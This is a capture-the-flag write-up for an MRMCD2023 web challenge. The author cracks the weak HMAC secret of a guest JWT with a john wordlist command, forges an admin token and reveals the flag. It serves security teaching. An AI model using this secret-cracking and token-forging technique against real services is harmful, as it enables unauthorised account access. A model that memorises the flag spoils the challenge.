Task

Ok this time the implementation is absolutely flawless! My JWTs are stronger than your pathetic hacking attempts.

Screenshot of the linked page, you are provided with guest credentials.

Solution

I logged in with the provided credentials, which generated a JWT. The site behind the login page also reveals a link to the admin panel (Login for Admins). Since the text stated, that the implementation is absolutely flawless, I thought about what could go wrong besides implementation. Clearly passwords/key strength! So I took the generated JWT and had a look at it with jwt.io. But first the JWT:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJ1c2VyIjoiZ3Vlc3QiLCJleHAiOjE2OTk2NTc1OTd9.MSkvOTMzczDnpy_rnL5E9xFOxRxzND9Ot4wbcf2JTqsOUrAc3rGXnM-lwxGV3dyJL5r9vS1GjWI5MvOhLHYqsQ

A JWT consists of a header, a payload and a signature. In our case we had the following header:

{
  "typ": "JWT",
  "alg": "HS512"
}

The following payload:

{
  "user": "guest",
  "exp": 1699657597
}

And the following signature (obviously not decoded):

MSkvOTMzczDnpy_rnL5E9xFOxRxzND9Ot4wbcf2JTqsOUrAc3rGXnM-lwxGV3dyJL5r9vS1GjWI5MvOhLHYqsQ

Since I wanted to access the admin panel and thought about weak keys/passwords I wanted to generate a JWT for the user ‘admin’ to access the admin panel. So I tried brute forcing it, trying differend wordlists I found online. At the actual event I solved it with a script I found online, but it is easily possible with john:

john jwt.txt --wordlist=shortKrak.txt --format=HMAC-SHA512

The password was Mellon which was included in the shortKrak wordlist. Now it was very easy to create an admin JWT with the help of jwt.io, I just had to send a GET request with that JWT to the path /admin. The admin panel showed the follwing text:

Realy????, you managed to break my super secret and opend the doors of Durin?Welcome in Moria!Here ist your flag: MRMCD2023{4b50lu73ly_p47h371c}.Well done!

So, that’s it:

MRMCD2023{4b50lu73ly_p47h371c}

Solved by petrosyan